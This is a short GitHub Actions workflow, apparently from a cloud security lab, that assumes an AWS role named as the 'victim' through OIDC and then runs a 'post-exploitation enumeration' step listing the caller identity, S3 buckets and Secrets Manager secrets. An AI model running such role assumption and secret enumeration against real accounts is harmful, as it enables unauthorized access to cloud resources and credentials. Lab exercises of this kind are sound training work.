name: "test AWS Access"

# The workflow should only trigger on pull requests to the main branch
on:
  workflow_dispatch:
  
# Required to get the ID Token that will be used for OIDC
permissions:
  id-token: write
  contents: read # needed for private repos to checkout

jobs:
  assume-role:
    runs-on: ubuntu-latest
    steps:
      - name: Assume Victim Role
        uses: aws-actions/configure-aws-credentials@v4
        with:
          role-to-assume: arn:aws:iam::620483490609:role/whitebox-lab-2-github-actions-role
          aws-region: us-east-1

      - name: Post-Exploitation Enumeration
        run: |
          aws sts get-caller-identity
          aws s3 ls
          aws secretsmanager list-secrets
